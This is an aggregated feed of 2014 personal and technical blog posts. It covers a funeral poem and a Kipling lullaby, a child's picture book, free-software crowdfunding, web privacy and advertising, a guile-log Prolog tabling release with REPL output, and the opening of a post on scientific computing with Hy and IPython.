My brother Andrew and sister-in-law Alice, who are wonderful, have made an Advent calendar about how churches can be welcoming to everyone, with each day written by a different person and discussing a different group: the Inclusive Advent Calendar.

A poem of mine

This is the poem I read at my grandmother's funeral.

 

ODE TO JOY

Our Joy has left us. Should we say goodbye?
Not while we smile recalling what she said;
not while the sharp remembrance of her eye
surprises us through all the days ahead;
not while the greenest branches of her tree
still show her love for living and for learning;
not while each grandchild welcomed on her knee
holds hope the world should never tire of turning;
not while our Joy lives on. The Prince of Peace
who holds her safe until we meet again
will call us too, where separations cease,
and builds a bridge between the now and then,
a bridge that even death could not destroy.
So lives our love, our hope, for peace for Joy.

A picture

 

https://gentlereaders.uk/pics/sidney-formal-hall

I wanted to show you a happy photo, so here's one of my grandparents when they came up to Cambridge for formal hall at my college. I think it's from 1998.

Something from someone else

This is Kipling's biography of Napoleon Bonaparte.

"Gay go up, gay go down" in the third stanza is a rhyme that was used at the time by children on seesaws. Can anyone explain the odd stress pattern on "Trafalgar" in the fifth stanza?

A ST HELENA LULLABY
by Rudyard Kipling

"How far is St. Helena from a little child at play!"
What makes you want to wander there with all the world between?
Oh, Mother, call your son again, or else he'll run away.
(No one thinks of winter when the grass is green!)

"How far is St. Helena from a fight in Paris street?"
I haven't time to answer now– the men are falling fast.
The guns begin to thunder, and the drums begin to beat.
(If you take the first step, you will take the last!)

"How far is St. Helena from the field of Austerlitz?"
You couldn't hear me if I told– so loud the cannons roar.
But not so far for people who are living by their wits.
("Gay go up" means "Gay go down" the wide world o'er!)

"How far is St. Helena from the Emperor of France?"
I cannot see– I cannot tell– the crowns they dazzle so.
The Kings sit down to dinner, and the Queens stand up to dance.
(After open weather, you may look for snow!)

"How far is St. Helena from the Capes of Trafalgar?"
A longish way– a longish way– with ten year more to run.
It's South across the water underneath a setting star.
(What you cannot finish, you must leave undone!)

"How far is St. Helena from the Beresina ice?"
An ill way– a chill way– the ice begins to crack.
But not so far for gentlemen who never took advice.
(When you can't go forward you must e'en come back!)

"How far is St. Helena from the field of Waterloo?"
A near way– a clear way– the ship will take you soon.
A pleasant place for gentlemen with little left to do.
(Morning never tries you till the afternoon!)

"How far from St. Helena to the Gate of Heaven's Grace?"
That no one knows– that no one knows– and no one ever will.
But fold your hands across your heart and cover up your face,
And after all your trapesings, child, lie still! 

Colophon

Gentle Readers is published on Mondays and Thursdays, and I want you to share it. The archives are at https://gentlereaders.uk, and so is a form to get on the mailing list. If you have anything to say or reply, or you want to be added or removed from the mailing list, I’m at thomas@thurman.org.uk and I’d love to hear from you. The newsletter is reader-supported; please pledge something if you can afford to, and please don't if you can't. ISSN 2057-052X. Love and peace to you all.

This entry was originally posted at http://marnanel.dreamwidth.org/317256.html. Please comment there using OpenID.

Syndicated 2014-12-02 00:36:53 from Monument

2 Dec 2014 marnanel   » (Journeyer)

Bonka, the Alphabet, and the Dreaded Balloon

When I was in Year 5 at primary school, though we called it third year juniors in those days, we were all given an assignment to write a picture book so that we could go into the infant school and read it to them. I have just found the picture book I wrote. It's called

BONKA,
THE ALPHABET,
AND THE DREADED BALLOON

http://thomasthurman.org/pics/bonka0

So of course I realised I had to blog it. I'll only do a few pages at a time, but feedback is very welcome.

http://thomasthurman.org/pics/bonka1
Here is Bonka. He is a slug.


http://thomasthurman.org/pics/bonka2
Here are the alphabet. These are the small letters.

http://thomasthurman.org/pics/bonka3
This is The Dreaded Balloon. He is BAD.

http://thomasthurman.org/pics/bonka4
One day, Bonka tripped over something.

http://thomasthurman.org/pics/bonka5
"Who are you?" asked Bonka. "I'm i," said i.

Let me know if you'd like to see the rest.

This entry was originally posted at http://marnanel.dreamwidth.org/317158.html. Please comment there using OpenID.

Syndicated 2014-12-01 23:49:07 from Monument

1 Dec 2014 joey   » (Master)

snowdrift - sustainable crowdfunding for free software development

In a recent blog post, I mentioned how lucky I feel to keep finding ways to work on free software. In the past couple years, I've had a successful Kickstarter, and followed that up with a second crowdfunding campaign, and now a grant is funding my work. A lot to be thankful for.

A one-off crowdfunding campaign to fund free software development is wonderful, if you can pull it off. It can start a new project, or kick an existing one into a higher gear. But in many ways, free software development is a poor match for kickstarter-type crowdfunding. Especially when it comes to ongoing development, which it's really hard to do a crowdfunding pitch for. That's why I was excited to find Snowdrift.coop, which has a unique approach.

Imagine going to a web page for a free software project that you care about, and seeing this button:

1283 patrons will donate MORE when you pledge

That's a lot stronger incentive than some paypal donation button or flattr link! The details of how it works are explained on their intro page, or see the ever-insightful and thoughtful Mike Linksvayer's blog post about it.

When I found out about this, I immediately sent them a one-off donation. Later, I got to meet one of the developers face to face in Portland. I've also done a small amount of work on the Snowdrift platform, which is itself free software. (My haskell code will actually render that button above!)

Free software is important, and its funding should be based, not on how lucky or good we are at kickstarter pitches, but on its quality and how useful it is to everyone. Snowdrift is the most interesting thing I've seen in this space, and I really hope they succeed. If you agree, they're running their own crowdfunding campaign right now.

Syndicated 2014-12-01 18:36:39 from see shy jo

30 Nov 2014 sye   » (Journeyer)

Darren Wilson has resigned from the police force. He married his fellow officer Barbara, who had a child from a previous relationship; they are expecting their first child together. Wilson has supporters. In other local news, parents are searching for a college senior missing since the eve of Thanksgiving. A $10,000 reward has been posted for any information leading to his safe return.

30 Nov 2014 dmarti   » (Master)

Unpacking privacy

Maybe the word "privacy" has something in common with the "freedom" in "free software". Privacy is a big heavy word, with too many meanings to be a good part of a business message. Some free software people handled their version of the problem by coming up with the open source brand, to help close deals without having to have a big conversation about freedom. Maybe what we need today is something similar, a name for a subset of privacy that's worth money.

The big place to cash in is display advertising on the web. The money in advertising is in signaling, not direct response. And an ad medium can optimize for response rate or for signaling power, but not both. So there's clearly a small part of "privacy" that has cash value: for publishers and brands on the web, the quality of having an audience rather than a set of database records, the chance at making web ads work like magazine ads, not like the "windshield flyers" they are today.

Before the emergence of the "open source" brand, people kept having "software freedom" vs. "commercial software" arguments. But the problem wasn't freedom on one side against business on the other. The framing around open source made it clear that some kinds of commerce work better when market participants have some kinds of freedom.

Today, "people want privacy" sounds to me like "people want freedom" and "people want data-driven services" sounds like "people want software functionality." That's a recipe for wasting a lot of carpal tunnels on having two different arguments, threaded together. We need a new word for the economically helpful aspects of privacy, so that we don't have to argue about a word that's just as complicated as "freedom" when we just want to implement a subset of it.

(We do need to keep talking about freedom and privacy sometimes, even though they're hard words. But just as we can have better Internet freedom conversations when we can show examples of corporate-supported free software, I mean open source, we'll also be in a better position to talk privacy when we can point to projects, under whatever the new word for that subset of privacy turns out to be, that work in the interests of publishers and brands.)

Publishers and brands can both use whatever the new word is. Publishers first. When ad networks can track the same user from expensive sites to cheap ones, and agencies buy impressions based on who the ad networks say the user is, then high-value sites (the ones that invest in original content) are stuck in the business of selling the same impressions as lower-value sites.

Once the ad networks have a user labeled as a "car intender", then some low-end site can show him a cheap cat GIF and get paid to run a (relatively) high-value car ad on it. Makes it harder for the sites that actually review cars. Content sites lose, and intermediaries win.

The question then is, why do high-value sites participate in user tracking at all? Why not just run only first-party ads? There's some research on that. The problem is that if the medium is targetable, then the best strategy for an individual site is to do targeting, even if (because of the signaling value of its content) the site would do better in a system where no user could be targeted. When we stop thinking about privacy as a big, complicated, hard concept, and try to break out some kind of Minimum Viable Privacy, just enough to protect that "car intender" from site to site tracking, then ways out of the race to the bottom start to present themselves.

For example, high-quality sites could be encouraging users to install anti-tracking tools, to make those users less targetable anywhere. This would reduce revenue in the short term for the high-quality sites (by making inventory disappear) but have a much more dramatic effect on the lower-quality sites that are only viable because of targeting. For brands, the case for helping and encouraging customers and prospects to protect a subset of "privacy" is even stronger. Just need a word for it.

Syndicated 2014-11-30 05:59:05 from Don Marti

29 Nov 2014 dmarti   » (Master)

simplicity

Complexity in organizational structures and agreements between people can hide information about what is the right thing to do.

The obligation to do the right thing, however, is conserved, passed through and divided among every participant in an organization or every party to an agreement.

This is the best reason I can think of, so far, to look for simplicity in organizations and in the terms of agreements.

Syndicated 2014-11-29 18:22:27 from Don Marti

28 Nov 2014 tampe   » (Journeyer)


If I'm going to do this an infinite number of times, I can just as well say I succeeded in doing so and get a good night's sleep

I just released a new version of guile-log, i.e. logic programming in Guile Scheme. This release has a few major improvements. The most noteworthy of them are:

Support for tabling, i.e. the Prolog version of memoisation. There are a few important facts to note. First of all, memoisation means that many infinite recursions will succeed and you can get a meaningful answer out of


f(X) :- f(X).

The meaning under memoisation is of course that if f recurses ad infinitum and never binds X, then f will succeed with X unbound. This is a nice feature together with the good support for recursive data structures that is now included in guile-log. The other peculiarity is that for a given input the code can yield many outputs via backtracking, so it is not an easy thing to churn out. I am by no means the first to produce such a tabling system. The most interesting thing, though, is that the machinery to implement this was (almost) already there, and the solution is simply meta-programming on those tools.

The system works by keeping, for each tabled function, a functional hash from any input to a list of outputs (which may contain duplicates). As new solutions are produced they are consed onto the list; when evaluating the function, it looks up the list of solutions and produces them as answers through backtracking. When all solutions have been produced, it looks up the functional data structure again to see if there are any new solutions; if not, it stores a continuation and then fails. There is a base case, the first time the function is called: if all continuation points have failed, it restarts all continuations, and each of them re-evaluates whether there are any new solutions to produce. If they all fail in the next round, a fixpoint has been found and no new solutions are produced. Neat. Be careful with negation (do you know why?). Let's show some Prolog ...


memo.scm:
------------------------------------
(compile-prolog-string
"
-functorize(tabling).
ff(X) :- (X=[Y,A,B]),ff(A),ff(B),(Y=1;Y=2).
"
------------------------------------
scheme@(guile-user)> (use-modules (logic guile-log iso-prolog))
scheme@(guile-user)> (load "memo.scm")
scheme@(guile-user)> ,L prolog
Happy hacking with Prolog! To switch back, type `,L scheme'.
prolog@(guile-user)> .rec ff(X).

X = {0}[1, ref[0], ref[0]]
more (y/n/a/s) > s
prolog@(guile-user)> .10 .c

X = {0}[2, ref[0], ref[0]]

X = {0}[1, ref[0], {1}[1, ref[1], ref[1]]]

X = {0}[2, ref[0], {1}[1, ref[1], ref[1]]]

X = {0}[1, ref[0], {1}[2, ref[1], ref[1]]]

X = {0}[2, ref[0], {1}[2, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[1, ref[1], ref[1]]]

X = [2, {0}[1, ref[0], ref[0]], {1}[1, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[2, ref[1], ref[1]]]

X = [2, {0}[1, ref[0], ref[0]], {1}[2, ref[1], ref[1]]]

X = [1, {0}[1, ref[0], ref[0]], {1}[1, ref[1], {2}[1, ref[2], ref[2]]]]
$1 = stalled
prolog@(guile-user)>

Note that the same solution can show up many times in this infinite list. It is possible to use tools that make sure the list is unique, but that is expensive and not shown here. Also note how one can issue an 's' to return to the guile prompt, from where state management can be done, as well as taking 10 values as shown above.

As shown above, recursion-aware unification, as well as many other recursion-aware operations, can now be enabled via a Prolog goal or the .rec switch at the command line.

A modified bdw-gc has been made (see the guile-log docs), and code inside Guile's C layer has enabled fully garbage-collected Prolog variables. Now most normal Prolog code will be safe to use even in a server setup where you basically tail call forever, and temporarily bound variables will not blow the stack. This was a pretty difficult thing to get fully working. A really nice hack indeed.

SWI-Prolog's attributed variables and coroutines have been implemented, at least partly, and with some extra bells and whistles. This feature means that you can hook in code that will be executed when variables are bound to specific values, or just bound at all; look up these features in the SWI-Prolog manual if you are interested. Pretty cool.
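The "run code when a variable gets bound" idea can be illustrated with a tiny sketch. This is a made-up Python analogue in the spirit of attributed variables, not guile-log's or SWI-Prolog's actual interface; the `Var`, `when_bound`, and `bind` names are hypothetical.

```python
# Hypothetical sketch of a "when bound" hook on a logic variable,
# in the spirit of SWI-Prolog's attributed variables.

class Var:
    """An unbound logic variable that runs registered hooks when bound."""

    def __init__(self, name):
        self.name = name
        self.value = None
        self.bound = False
        self.hooks = []              # callables to run on binding

    def when_bound(self, hook):
        """Register `hook(value)` to fire when this variable is bound."""
        self.hooks.append(hook)

    def bind(self, value):
        if self.bound:
            raise ValueError(f"{self.name} is already bound")
        self.value = value
        self.bound = True
        for hook in self.hooks:      # coroutine-style wakeup
            hook(value)

# Usage: attach a hook, then bind the variable and watch it fire.
events = []
x = Var("X")
x.when_bound(lambda v: events.append(("X", v)))
x.bind(42)
print(events)   # [('X', 42)]
```

In a real system the hook would typically re-enter the solver (e.g. wake a suspended goal), and unbinding on backtracking would also have to be handled; both are omitted here.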

Operator bindings are now namespaced, meaning that by importing a module operators can get a new meaning. This can be used to take advantage of Guile's numeric tower and not adhere strictly to ISO Prolog.

OK, there are a few more points in the release; download it and have a play. I'm basically the only user and implementor, so it is cool but still alpha software. I'm now heading towards being able to compile at least parts of the SWI-Prolog system, to get more testing and because it is a nice bite to chew on; getting good Prolog compatibility regarding the module system and a few more points is the goal.


Happy hacking and have fun!

28 Nov 2014 oubiwann   » (Journeyer)

Scientific Computing with Hy and IPython

This blog post is a bit different from other technical posts I've done in the past in that the majority of the content is not in the blog post or in gists; instead, it is in an IPython notebook. Having adored Mathematica back in the 90s, you can imagine how much I love the IPython Notebook app. I'll have more to say on that at a future date.

I've been doing a great deal of NumPy and matplotlib again lately, every day for hours a day. In conjunction with the new features in Python 3, this has been quite a lot of fun -- the most fun I've had with Python in years (thanks Guido, et al!). As you might have guessed, I'm also using it with Erlang (specifically, LFE), but that too is for a post yet to come.

With all this matplotlib and numpy work in standard Python, I've been going through Lisp withdrawals and needed to work with it from a fresh perspective. Needless to say, I had an enormous amount of fun doing this. Naturally, I decided to share with folks how one can do the latest and greatest with the tools of Python scientific computing, but in the syntax of the Python community's best kept secret: Clojure-Flavoured Python (Github, Twitter, Wikipedia).

(Figure spoiler: observed data and polynomial curve fitting.)
Looking about for ideas, I decided to see what Clojure's Incanter project had for tutorials, and immediately found what I was looking for: Linear regression with higher-order terms, a 2009 post by David Edgar Liebke.
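The core of that tutorial — fitting a polynomial to observed data — can be sketched without any dependencies. The notebook itself uses the NumPy/matplotlib stack; this is just a plain-Python illustration of the underlying least-squares idea via the normal equations, with made-up sample data.

```python
# Dependency-free sketch of polynomial least-squares fitting via the
# normal equations (V^T V) c = V^T y, where V is the Vandermonde matrix.

def solve(A, b):
    """Solve A x = b by Gaussian elimination with partial pivoting."""
    n = len(A)
    M = [row[:] + [bi] for row, bi in zip(A, b)]   # augmented matrix
    for col in range(n):
        pivot = max(range(col, n), key=lambda r: abs(M[r][col]))
        M[col], M[pivot] = M[pivot], M[col]
        for r in range(col + 1, n):
            f = M[r][col] / M[col][col]
            for c in range(col, n + 1):
                M[r][c] -= f * M[col][c]
    x = [0.0] * n
    for r in range(n - 1, -1, -1):                 # back substitution
        x[r] = (M[r][n] - sum(M[r][c] * x[c] for c in range(r + 1, n))) / M[r][r]
    return x

def polyfit(xs, ys, degree):
    """Least-squares polynomial fit; returns [c0, c1, ...] for sum(ci * x**i)."""
    n = degree + 1
    A = [[sum(x ** (i + j) for x in xs) for j in range(n)] for i in range(n)]
    b = [sum(y * x ** i for x, y in zip(xs, ys)) for i in range(n)]
    return solve(A, b)

# Sample data taken from y = 1 + 2x + 3x^2, so the fit recovers [1, 2, 3].
xs = [0.0, 1.0, 2.0, 3.0]
ys = [1.0, 6.0, 17.0, 34.0]
coeffs = polyfit(xs, ys, 2)
print([round(c, 6) for c in coeffs])   # [1.0, 2.0, 3.0]
```

In the notebook the equivalent one-liner is NumPy's polynomial fitting, which also handles the higher-order terms the Incanter tutorial explores.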

Nearly every cell in the tutorial notebook is in Hy, and for that we owe a huge thanks to yardsale8 for his Hy IPython magics code. For those that love Python and Lisp equally, who are familiar with the ecosystems' tools, Hy offers a wonderful option for being highly productive with a language supporting Lisp- and Clojure-style macros. You can get your work done, have a great time doing it, and let that inner code artist out!

(In fact, I've started writing a macro for one of the examples in the tutorial, offering a more Lisp-like syntax for creating class methods. We'll see what Paul Tagliamonte has to say about it when it's done ... !)

If you want to check out the notebook code and run it locally, just do the following:
